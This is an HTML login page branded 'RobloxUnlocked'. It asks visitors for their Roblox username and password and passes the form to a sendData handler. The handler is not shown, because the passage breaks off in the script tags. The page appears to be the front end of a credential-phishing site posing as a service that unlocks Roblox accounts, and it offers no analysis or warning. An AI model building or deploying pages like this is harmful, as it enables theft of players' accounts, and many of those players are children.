<!DOCTYPE html>
<html>
<head>
	<title>RobloxUnlocked - Login</title>
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
	<style type="text/css">
		body {
			background-color: #181818;
			color: #FFF;
			font-family: Arial, sans-serif;
			font-size: 14px;
		}

		.container {
			margin-top: 50px;
		}

		.card {
			margin-bottom: 20px;
		}

		.card-header {
			background-color: #1f1f1f;
			border-bottom: none;
			color: #FFF;
			font-size: 18px;
			font-weight: bold;
			text-align: center;
		}

		.card-body {
			background-color: #282828;
			padding: 20px;
		}

		.form-group label {
			color: #FFF;
			font-weight: bold;
		}

		.form-group input[type="text"], .form-group input[type="password"] {
			background-color: #303030;
			border-color: #606060;
			color: #FFF;
		}

		.form-group input[type="text"]::placeholder, .form-group input[type="password"]::placeholder {
			color: #a0a0a0;
		}

		.btn {
			background-color: #4d90fe;
			border-color: #3079ed;
			border-radius: 3px;
			color: #FFF;
			font-size: 16px;
			font-weight: bold;
			padding: 8px 20px;
			text-shadow: none;
			width: 100%;
		}
	</style>
</head>
<body>
	<div class="container">
		<div class="row">
			<div class="col-md-4 offset-md-4">
				<div class="card">
					<div class="card-header">RobloxUnlocked</div>
					<div class="card-body">
						<form onsubmit="sendData(event)">
							<div class="form-group">
								<label>Username</label>
								<input type="text" class="form-control" placeholder="Enter your roblox username" id="username">
							</div>
							<div class="form-group">
								<label>Password</label>
								<input type="password" class="form-control" placeholder="Enter your roblox password" id="password">
							</div>
							<button type="submit" class="btn">Login</button>
						</form>
					</div>
				</div>
			</div>
		</div>
	</div>

	<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B
